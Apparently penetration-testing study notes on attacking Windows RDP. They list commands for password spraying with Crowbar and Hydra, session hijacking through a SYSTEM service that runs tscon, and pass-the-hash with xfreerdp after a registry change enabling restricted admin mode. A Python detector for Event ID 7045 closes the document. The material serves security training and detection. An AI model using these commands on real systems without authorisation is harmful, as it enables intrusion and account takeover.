> See RDP Footprinting notes for more details: [[5 - CPTS Notes/2 - Footprinting Module/Service Enumeration/Windows Remote Mgmt|Windows Remote Mgmt]]

# Introduction

- Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft for GUI connection to a remote machine over the network
- By default, RDP runs on TCP/3389

# Enumeration

```bash
sudo nmap -Pn -p3389 -sC -sV <target_ip>
```

# Misconfigurations

- By default, RDP requires a username and password
- However, a null password is possible
- Brute-forcing is also possible
    - Subject to password policy restrictions
    - Best to determine the password policy before spraying
- `Crowbar` or `Hydra` can be used for a password spraying attack against RDP

```bash
sudo crowbar -b rdp -s <target_ip> -U users.txt -c 'password123'
sudo hydra -L users.txt -p 'password123' <target_ip> rdp
```

# RDP Login

- `rdesktop` or `xfreerdp3` can be used to log in from Linux

```bash
xfreerdp /v:<target_ip> /u:<username> /p:<password> /dynamic-resolution /drive:linux,~/Documents/htb
rdesktop -u <username> -p <password> <target_ip> -d <FQDN>
```

# RDP Specific Attacks

## RDP Session Hijacking

- To successfully impersonate a user without their password, we need to have `SYSTEM` privileges and use the Microsoft [tscon.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tscon) binary, which enables users to connect to another desktop session
    - We need the session ID for the target user
    - This method no longer works for Windows Server 2019
- If we have local administrator privileges, we can use several methods to obtain `SYSTEM` privileges, such as [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) or [Mimikatz](https://github.com/gentilkiwi/mimikatz)
- Simple trick: create a Windows service that, by default, will run as `Local System` and will execute any binary with `SYSTEM` privileges
    - Below, we use the Microsoft [sc.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create) binary
    - Then, we specify the service name (`sessionhijack`) and the `binpath`, which is the command we want to execute
    - When we run the command, a service named `sessionhijack` will be created

```powershell
whoami /priv
query user    # shows RDP sessions for all users
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:<target_session_name>"
net start sessionhijack    # opens a new terminal as the target user
```

## RDP PtH

> For similar steps, see PtH in the Password Attacks Module: [[5 - CPTS Notes/6 - Password Attacks/16 - Pash the Hash (PtH)|16 - Pash the Hash (PtH)]]

- Assuming we only have the NT hash of a target user, obtained through a credential dumping attack such as one against the [SAM](https://en.wikipedia.org/wiki/Security_Account_Manager) database, and we could not crack the hash to reveal the plaintext password, we can perform an RDP PtH attack to gain GUI access to the target system using tools like `xfreerdp3`
- First, we need to enable `restricted admin mode` on the target host, else we will get an error
![[images/Pasted image 20251017191745.png]]
- To fix this error, add a new `DisableRestrictedAdmin` registry value (`REG_DWORD`) under `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa`

```cmd
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```

- Then PtH with `xfreerdp3`

```bash
xfreerdp3 /v:<target_ip> /u:username /pth:<NT_hash> /dynamic-resolution
```
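The service-based session hijack above leaves a clear trace for defenders: the `sc.exe create` is recorded in the System log as Service Control Manager Event ID 7045 ("A service was installed in the system"), whose `Service File Name` field carries the `tscon` command. The Python below is an added detection example, not part of these notes; it parses the standard 7045 message body and flags any service whose binary path invokes `tscon`. The two sample message bodies are constructed test data.

```python
import re

# Field labels from the message body of Windows System log Event ID 7045
# ("A service was installed in the system").
FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Type|Service Start Type|Service Account):\s*(.*)$",
    re.MULTILINE,
)
# tscon launched from a service binary path: "tscon <session id> /dest:<session name>"
TSCON_RE = re.compile(r"\btscon(?:\.exe)?\s+(\d+)\s+/dest:(\S+)", re.IGNORECASE)


def parse_7045(message: str) -> dict:
    """Return the labelled fields of a 7045 message body as a dict."""
    return {label: value.strip() for label, value in FIELD_RE.findall(message)}


def find_tscon_services(messages: list) -> list:
    """Flag service installs whose binary path runs tscon (the session-hijack pattern)."""
    findings = []
    for msg in messages:
        fields = parse_7045(msg)
        path = fields.get("Service File Name", "")
        m = TSCON_RE.search(path)
        if not m:
            continue  # ordinary service install, nothing to report
        findings.append({
            "service": fields.get("Service Name", ""),
            "account": fields.get("Service Account", ""),
            "source_session": int(m.group(1)),  # session being attached (2 in the notes above)
            "dest_session": m.group(2),         # session that receives it
            "image_path": path,
        })
    return findings

# Constructed sample 7045 message bodies (made-up test data, not from a real host).
SAMPLE_MESSAGES = [
    "A service was installed in the system.\n\nService Name:  sessionhijack\n"
    "Service File Name:  cmd.exe /k tscon 2 /dest:rdp-tcp#5\n"
    "Service Type:  user mode service\nService Start Type:  demand start\n"
    "Service Account:  LocalSystem\n",
    "A service was installed in the system.\n\nService Name:  BackupAgent\n"
    "Service File Name:  \"C:\\Program Files\\Backup\\agent.exe\" --svc\n"
    "Service Type:  user mode service\nService Start Type:  auto start\n"
    "Service Account:  LocalSystem\n",
]

if __name__ == "__main__":
    for f in find_tscon_services(SAMPLE_MESSAGES):
        print(f"{f['service']} ({f['account']}): session {f['source_session']} -> {f['dest_session']}")
```

The same check applies to Security log Event ID 4697 on hosts where service-install auditing is enabled, since it records the same service file name.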